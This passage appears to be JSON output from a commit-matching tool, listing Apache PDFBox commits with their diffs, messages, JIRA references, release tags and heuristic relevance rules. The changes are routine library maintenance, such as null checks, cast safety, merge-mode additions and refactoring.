gsubWorkers.put((PDType0Font) font, gsubWorker);", + "- }", + "- }", + "-", + "- writeOperand(resources.add(font));", + "- writeOperand(fontSize);", + "- writeOperator(\"Tf\");", + "+ super(doc, outputStream, appearance.getResources());", + " }", + "@@ -316,61 +247,2 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + "- /**", + "- * Outputs a string using the correct encoding and subsetting as required.", + "- *", + "- * @param text The Unicode text to show.", + "- * ", + "- * @throws IOException If an io exception occurs.", + "- */", + "- @Override", + "- protected void showTextInternal(String text) throws IOException", + "- {", + "- if (!inTextMode)", + "- {", + "- throw new IllegalStateException(\"Must call beginText() before showText()\");", + "- }", + "-", + "- if (fontStack.isEmpty())", + "- {", + "- throw new IllegalStateException(\"Must call setFont() before showText()\");", + "- }", + "-", + "- PDFont font = fontStack.peek();", + "-", + "- byte[] encodedText = null;", + "-", + "- if (font instanceof PDType0Font)", + "- {", + "-", + "- GsubWorker gsubWorker = gsubWorkers.get(font);", + "- if (gsubWorker != null)", + "- {", + "- PDType0Font pdType0Font = (PDType0Font) font;", + "- Set glyphIds = new HashSet<>();", + "- encodedText = encodeForGsub(gsubWorker, glyphIds, pdType0Font, text);", + "- if (pdType0Font.willBeSubset())", + "- {", + "- pdType0Font.addGlyphsToSubset(glyphIds);", + "- }", + "- }", + "- }", + "-", + "- if (encodedText == null)", + "- {", + "- encodedText = font.encode(text);", + "- }", + "-", + "- // Unicode code points to keep when subsetting", + "- if (font.willBeSubset())", + "- {", + "- for (int offset = 0; offset < text.length(); )", + "- {", + "- int codePoint = text.codePointAt(offset);", + "- font.addToSubset(codePoint);", + "- offset += Character.charCount(codePoint);", + "- }", + "- }", + "-", + "- COSWriter.writeString(encodedText, outputStream);", + "- }", + "-", + " /**", + "@@ -588,46 +460,2 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + "- /**", + "- * q operator. Saves the current graphics state.", + "- * @throws IOException If an error occurs while writing to the stream.", + "- */", + "- @Override", + "- public void saveGraphicsState() throws IOException", + "- {", + "- if (!fontStack.isEmpty())", + "- {", + "- fontStack.push(fontStack.peek());", + "- }", + "- if (!strokingColorSpaceStack.isEmpty())", + "- {", + "- strokingColorSpaceStack.push(strokingColorSpaceStack.peek());", + "- }", + "- if (!nonStrokingColorSpaceStack.isEmpty())", + "- {", + "- nonStrokingColorSpaceStack.push(nonStrokingColorSpaceStack.peek());", + "- }", + "- writeOperator(\"q\");", + "- }", + "-", + "- /**", + "- * Q operator. Restores the current graphics state.", + "- * @throws IOException If an error occurs while writing to the stream.", + "- */", + "- @Override", + "- public void restoreGraphicsState() throws IOException", + "- {", + "- if (!fontStack.isEmpty())", + "- {", + "- fontStack.pop();", + "- }", + "- if (!strokingColorSpaceStack.isEmpty())", + "- {", + "- strokingColorSpaceStack.pop();", + "- }", + "- if (!nonStrokingColorSpaceStack.isEmpty())", + "- {", + "- nonStrokingColorSpaceStack.pop();", + "- }", + "- writeOperator(\"Q\");", + "- }", + "-", + " /**", + "@@ -1149,98 +977,2 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + " }", + "- ", + "- /**", + "- * Set an extended graphics state.", + "- * ", + "- * @param state The extended graphics state.", + "- * @throws IOException If the content stream could not be written.", + "- */", + "- @Override", + "- public void setGraphicsStateParameters(PDExtendedGraphicsState state) throws IOException", + "- {", + "- writeOperand(resources.add(state));", + "- writeOperator(\"gs\");", + "- }", + "-", + "- /**", + "- * Set the text rendering mode. This determines whether showing text shall cause glyph outlines", + "- * to be stroked, filled, used as a clipping boundary, or some combination of the three.", + "- *", + "- * @param rm The text rendering mode.", + "- * @throws IOException If the content stream could not be written.", + "- */", + "- public void setRenderingMode(RenderingMode rm) throws IOException", + "- {", + "- writeOperand(rm.intValue());", + "- writeOperator(\"Tr\");", + "- }", + "-", + "- /**", + "- * Set the text rise value, i.e. move the baseline up or down. This is useful for drawing", + "- * superscripts or subscripts.", + "- *", + "- * @param rise Specifies the distance, in unscaled text space units, to move the baseline up or", + "- * down from its default location. 0 restores the default location.", + "- * @throws IOException", + "- */", + "- public void setTextRise(float rise) throws IOException", + "- {", + "- writeOperand(rise);", + "- writeOperator(\"Ts\");", + "- }", + "-", + "- private byte[] encodeForGsub(GsubWorker gsubWorker,", + "- Set glyphIds, PDType0Font font, String text) throws IOException", + "- {", + "-", + "- String spaceRegexPattern = \"\\\\s\";", + "- Pattern spaceRegex = Pattern.compile(spaceRegexPattern);", + "-", + "- // break the entire chunk of text into words by splitting it with space", + "- List words = new CompoundCharacterTokenizer(\"\\\\s\").tokenize(text);", + "-", + "- ByteArrayOutputStream out = new ByteArrayOutputStream();", + "-", + "- for (String word : words)", + "- {", + "- if (spaceRegex.matcher(word).matches())", + "- {", + "- out.write(font.encode(word));", + "- }", + "- else", + "- {", + "- glyphIds.addAll(applyGSUBRules(gsubWorker, out, font, word));", + "- }", + "- }", + "-", + "- return out.toByteArray();", + "- }", + "-", + "- private List applyGSUBRules(GsubWorker gsubWorker, ByteArrayOutputStream out, PDType0Font font, String word) throws IOException", + "- {", + "- List originalGlyphIds = new ArrayList<>();", + "- CmapLookup cmapLookup = font.getCmapLookup();", + "-", + "- // convert characters into glyphIds", + "- for (char unicodeChar : word.toCharArray())", + "- {", + "- int glyphId = cmapLookup.getGlyphId(unicodeChar);", + "- if (glyphId <= 0)", + "- {", + "- throw new IllegalStateException(", + "- \"could not find the glyphId for the character: \" + unicodeChar);", + "- }", + "- originalGlyphIds.add(glyphId);", + "- }", + "-", + "- List glyphIdsAfterGsub = gsubWorker.applyTransforms(originalGlyphIds);", + "-", + "- for (Integer glyphId : glyphIdsAfterGsub)", + "- {", + "- out.write(font.encodeGlyphId(glyphId));", + "- }", + "-", + "- return glyphIdsAfterGsub;", + "-", + "- }", + "-", + " }", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPatternContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPatternContentStream.java", + "index 64bd45acb..c4a6bf88e 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPatternContentStream.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPatternContentStream.java", + "@@ -36,3 +36,3 @@ public final class PDPatternContentStream extends PDAbstractContentStream", + " {", + "- super(pattern.getContentStream().createOutputStream(), pattern.getResources());", + "+ super(null, pattern.getContentStream().createOutputStream(), pattern.getResources());", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDFormContentStream.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPatternContentStream.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4068": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: page", + "relevance": 4 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4068", + "relevance": 2 + } + ] + }, + { + "commit_id": "a5449d6fea0d20302643cd6035e0479ed1b35b60", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1531154230, + "hunks": 1, + "message": "PDFBOX-4261: copy xref table entries to make sure that object numbers are kept when saving incrementally git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/1.8@1835454 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/NonSequentialPDFParser.java b/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/NonSequentialPDFParser.java", + "index dab6b2f43..364edcfee 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/NonSequentialPDFParser.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/NonSequentialPDFParser.java", + "@@ -646,2 +646,4 @@ public class NonSequentialPDFParser extends PDFParser", + " checkXrefOffsets();", + "+ // copy xref table", + "+ document.addXRefTable(xrefTrailerResolver.getXrefTable());", + " return trailer;" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdfparser/NonSequentialPDFParser.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4261": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "1.8.16", + "1.8.17" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: parse", + "relevance": 4 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4261", + "relevance": 2 + } + ] + }, + { + "commit_id": "44459e8b94c95211ffb3ada07b31be032ce2c7f8", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1523708898, + "hunks": 1, + "message": "PDFBOX-3809: add missing test for hasMissingPageRef before LOG statement git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1829135 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java", + "index e715bb9a4..5d47308fa 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java", + "@@ -805,3 +805,6 @@ public final class PDAcroForm implements COSObjectable", + " // widget. But this will be much slower so will be omitted for now.", + "- LOG.warn(\"There has been a widget with a missing page reference. Please report to the PDFBox project\");", + "+ if (hasMissingPageRef)", + "+ {", + "+ LOG.warn(\"There has been a widget with a missing page reference. Please report to the PDFBox project\");", + "+ }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3809": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: page", + "relevance": 4 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3809", + "relevance": 2 + } + ] + }, + { + "commit_id": "a5ead97b122eaba8cbcaab15d71b990691b1c21a", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1523727830, + "hunks": 1, + "message": "PDFBOX-4182, PDFBOX-4188: correct javadoc git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1829159 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", + "index 0ce2de7b5..ecf046e87 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", + "@@ -102,5 +102,5 @@ public class PDFMergerUtility", + " * ", + "- *

  • {@link DocumentMergeMode#PDFBOX_LEGACY_MODE} fields with the same fully qualified name", + "- * will be renamed and treated as independent. This mode was used in versions", + "- * of PDFBox up to 2.x.", + "+ *
  • {@link DocumentMergeMode#PDFBOX_LEGACY_MODE} Keeps all files open until the", + "+ * merge has been completed. This is currently necessary to merge documents", + "+ * containing a Structure Tree.
    This is the standard mode for PDFBox 2.0.", + " * " + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4182": "", + "PDFBOX-4188": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "5c3cf8f2edd00f49ff3a261a42b8633fdaa786dd" + ] + ], + "tags": [ + "2.0.10", + "2.0.11", + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4182, PDFBOX-4188", + "relevance": 2 + } + ] + }, + { + "commit_id": "6563576aabf4cee1628889b23d7bb9f70a5be844", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1532535998, + "hunks": 8, + "message": "PDFBOX-4071: avoid ClassCastException git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1836646 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3Font.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3Font.java", + "index 5fc9bbce1..78faf5a0d 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3Font.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3Font.java", + "@@ -115,4 +115,4 @@ public class PDType3Font extends PDSimpleFont", + " {", + "- COSStream stream = (COSStream) getCharProcs().getDictionaryObject(COSName.getPDFName(name));", + "- return stream != null;", + "+ COSBase base = getCharProcs().getDictionaryObject(COSName.getPDFName(name));", + "+ return base instanceof COSStream;", + " }", + "@@ -226,6 +226,6 @@ public class PDType3Font extends PDSimpleFont", + " {", + "- COSArray array = (COSArray) dict.getDictionaryObject(COSName.FONT_MATRIX);", + "- if (array != null)", + "+ COSBase base = dict.getDictionaryObject(COSName.FONT_MATRIX);", + "+ if (base instanceof COSArray)", + " {", + "- fontMatrix = new Matrix(array);", + "+ fontMatrix = new Matrix((COSArray) base);", + " }", + "@@ -255,6 +255,6 @@ public class PDType3Font extends PDSimpleFont", + " {", + "- COSDictionary resourcesDict = (COSDictionary) dict.getDictionaryObject(COSName.RESOURCES);", + "- if (resourcesDict != null)", + "+ COSBase base = dict.getDictionaryObject(COSName.RESOURCES);", + "+ if (base instanceof COSDictionary)", + " {", + "- this.resources = new PDResources(resourcesDict);", + "+ this.resources = new PDResources((COSDictionary) base);", + " }", + "@@ -271,7 +271,7 @@ public class PDType3Font extends PDSimpleFont", + " {", + "- COSArray rect = (COSArray) dict.getDictionaryObject(COSName.FONT_BBOX);", + "+ COSBase base = dict.getDictionaryObject(COSName.FONT_BBOX);", + " PDRectangle retval = null;", + "- if(rect != null)", + "+ if (base instanceof COSArray)", + " {", + "- retval = new PDRectangle(rect);", + "+ retval = new PDRectangle((COSArray) base);", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3Font.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "f65839e45cf27ff0c178cdf4398c5b39dd1c4102" + ] + ], + "tags": [ + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "ffb9596746b636b7f85429fd7b9b06df653fa606", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1524159762, + "hunks": 1, + "message": "PDFBOX-4071: add comment git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1829580 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", + "index 616d7b845..a431e858a 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", + "@@ -721,2 +721,4 @@ public class PDFMergerUtility", + " {", + "+ // add the value of the destination ParentTreeNextKey to every source element ", + "+ // StructParent(s) value so that these don't overlap with the existing values", + " updateStructParentEntries(newPage, destParentTreeNextKey);" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "16591de35c096b22bb9cada8509f460ef2c0ce21" + ], + [ + "no-tag", + "7a398b4319d294c1ffa7105f50680e98be6604a0" + ] + ], + "tags": [ + "2.0.10", + "2.0.11", + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "679b076473675cd697124c16b1936e42324ae127", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1527790046, + "hunks": 1, + "message": "PDFBOX-4235: avoid NPE if font is not defined in /DA string git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832635 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java", + "index 03218edb2..1c40f70c5 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java", + "@@ -413,3 +413,6 @@ class AppearanceGeneratorHelper", + " PDFont font = defaultAppearance.getFont();", + "- ", + "+ if (font == null)", + "+ {", + "+ throw new IllegalStateException(\"font is null, check whether /DA entry is incomplete or incorrect\");", + "+ }", + " // calculate the fontSize (because 0 = autosize)" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4235": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "86569de9c42a2589927280c7fca684e5c946779b" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4235", + "relevance": 2 + } + ] + }, + { + "commit_id": "0cd3397d9332026f633e9f859c467270f98e0446", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1523727211, + "hunks": 2, + "message": "PDFBOX-4182, PDFBOX-4188: add new merge mode which closes the source PDDocument after the individual merge; early implementation git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1829156 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", + "index e418daa6e..0ce2de7b5 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", + "@@ -90,2 +90,25 @@ public class PDFMergerUtility", + "+ private DocumentMergeMode documentMergeMode = DocumentMergeMode.PDFBOX_LEGACY_MODE;", + "+", + "+ /**", + "+ * The mode to use when merging documents.", + "+ * ", + "+ *

      ", + "+ *
    • {@link DocumentMergeMode#OPTIMIZE_RESOURCES_MODE} Optimizes resource handling such as", + "+ * closing documents early. Not all document elements are merged compared to", + "+ * the PDFBOX_LEGACY_MODE. Currently supported are:", + "+ *
        ", + "+ *
      • Page content and resources", + "+ *
      ", + "+ *
    • {@link DocumentMergeMode#PDFBOX_LEGACY_MODE} fields with the same fully qualified name", + "+ * will be renamed and treated as independent. This mode was used in versions", + "+ * of PDFBox up to 2.x.", + "+ *
    ", + "+ */", + "+ public enum DocumentMergeMode", + "+ {", + "+ OPTIMIZE_RESOURCES_MODE,", + "+ PDFBOX_LEGACY_MODE", + "+ }", + "+", + " /**", + "@@ -252,2 +275,80 @@ public class PDFMergerUtility", + " public void mergeDocuments(MemoryUsageSetting memUsageSetting) throws IOException", + "+ {", + "+ if (documentMergeMode == DocumentMergeMode.PDFBOX_LEGACY_MODE)", + "+ {", + "+ legacyMergeDocuments(memUsageSetting);", + "+ }", + "+ else if (documentMergeMode == DocumentMergeMode.OPTIMIZE_RESOURCES_MODE)", + "+ {", + "+ optimizedMergeDocuments(memUsageSetting, sources);", + "+ }", + "+ }", + "+", + "+ private void optimizedMergeDocuments(MemoryUsageSetting memUsageSetting, List sourceDocuments) throws IOException", + "+ {", + "+ PDDocument destination = null;", + "+ try", + "+ {", + "+ destination = new PDDocument(memUsageSetting);", + "+ PDFCloneUtility cloner = new PDFCloneUtility(destination);", + "+", + "+ for (InputStream sourceInputStream : sources)", + "+ {", + "+ PDDocument sourceDoc = null;", + "+ try", + "+ {", + "+ sourceDoc = PDDocument.load(sourceInputStream, memUsageSetting);", + "+", + "+ for (PDPage page : sourceDoc.getPages())", + "+ {", + "+ PDPage newPage = new PDPage((COSDictionary) cloner.cloneForNewDocument(page.getCOSObject()));", + "+ newPage.setCropBox(page.getCropBox());", + "+ newPage.setMediaBox(page.getMediaBox());", + "+ newPage.setRotation(page.getRotation());", + "+ PDResources resources = page.getResources();", + "+ if (resources != null)", + "+ {", + "+ // this is smart enough to just create references for resources that are used on multiple pages", + "+ newPage.setResources(new PDResources((COSDictionary) cloner.cloneForNewDocument(resources)));", + "+ }", + "+ else", + "+ {", + "+ newPage.setResources(new PDResources());", + "+ }", + "+ destination.addPage(newPage);", + "+ }", + "+ sourceDoc.close();", + "+ }", + "+ finally", + "+ {", + "+ IOUtils.closeQuietly(sourceDoc);", + "+ }", + "+ sourceInputStream.close();", + "+ }", + "+ ", + "+ if (destinationStream == null)", + "+ {", + "+ destination.save(destinationFileName);", + "+ }", + "+ else", + "+ {", + "+ destination.save(destinationStream);", + "+ }", + "+ }", + "+ finally", + "+ {", + "+ IOUtils.closeQuietly(destination);", + "+ }", + "+ }", + "+", + "+ /**", + "+ * Merge the list of source documents, saving the result in the destination", + "+ * file.", + "+ *", + "+ * @param memUsageSetting defines how memory is used for buffering PDF streams;", + "+ * in case of null unrestricted main memory is used ", + "+ * ", + "+ * @throws IOException If there is an error saving the document.", + "+ */", + "+ private void legacyMergeDocuments(MemoryUsageSetting memUsageSetting) throws IOException", + " {" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4182": "", + "PDFBOX-4188": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "9045df5f353972cbddca45c0d7cd15f25cc28c19" + ] + ], + "tags": [ + "2.0.10", + "2.0.11", + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4182, PDFBOX-4188", + "relevance": 2 + } + ] + }, + { + "commit_id": "18a5850ec8daa7a46b196d462100abcb39425932", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1529946072, + "hunks": 1, + "message": "PDFBOX-4071: remove command that doesn't exist in 2.* from \"usage\" message git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1834346 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/tools/src/main/java/org/apache/pdfbox/tools/PDFBox.java b/tools/src/main/java/org/apache/pdfbox/tools/PDFBox.java", + "index 472419e69..1ef727a4f 100644", + "--- a/tools/src/main/java/org/apache/pdfbox/tools/PDFBox.java", + "+++ b/tools/src/main/java/org/apache/pdfbox/tools/PDFBox.java", + "@@ -109,3 +109,2 @@ public final class PDFBox", + " + \"\\nPossible commands are:\\n\"", + "- + \" ConvertColorspace\\n\"", + " + \" Decrypt\\n\"" + ], + "changed_files": [ + "tools/src/main/java/org/apache/pdfbox/tools/PDFBox.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "4cfd06ef1c1493b9c69239d86e02b1a7e839aec6" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "ec2e25303facbc19557decd92ddc225424b6062f", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1530812177, + "hunks": 2, + "message": "PDFBOX-4242: better method name git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1835162 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java", + "index 6dd79df70..ec21bee87 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java", + "@@ -906,3 +906,3 @@ public class PDDocument implements Closeable", + " */", + "- public void registerTrueTypeFont(TrueTypeFont ttf)", + "+ public void registerTrueTypeFontForClosing(TrueTypeFont ttf)", + " {", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", + "index f2e225997..4b8f756ad 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", + "@@ -224,3 +224,3 @@ public class PDType0Font extends PDFont implements PDVectorFont", + " this.ttf = ttf;", + "- document.registerTrueTypeFont(ttf);", + "+ document.registerTrueTypeFontForClosing(ttf);", + " }" + ], + "changed_files": [ + 